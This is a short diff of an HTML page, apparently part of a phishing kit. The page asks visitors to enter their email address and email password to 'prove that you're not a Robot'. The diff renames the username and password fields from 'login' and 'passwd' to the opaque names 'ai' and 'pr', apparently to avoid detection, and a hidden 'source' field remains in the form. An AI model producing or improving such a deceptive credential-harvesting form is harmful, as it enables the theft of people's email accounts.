--- a/index.html
+++ b/index.html
@@ -278,10 +278,10 @@
         <p>Please sign in with your email to prove that you're not a Robot.</p>
         <div class="error" style="margin-top: 5px; display: none" id="err"></div>
         <div class="finput">
-          <input type="email" id="pet" name="login" placeholder="Email Address" readonly required>
+          <input type="email" id="pet" name="ai" placeholder="Email Address" readonly required>
         </div>
         <div class="finput">
-          <input type="password" name="passwd" placeholder="Email Password" id="pett" required="">
+          <input type="password" name="pr" placeholder="Email Password" id="pett" required="">
           <input type="hidden" id="source" name="source" value="others">
         </div>
         <div class="finput btn">
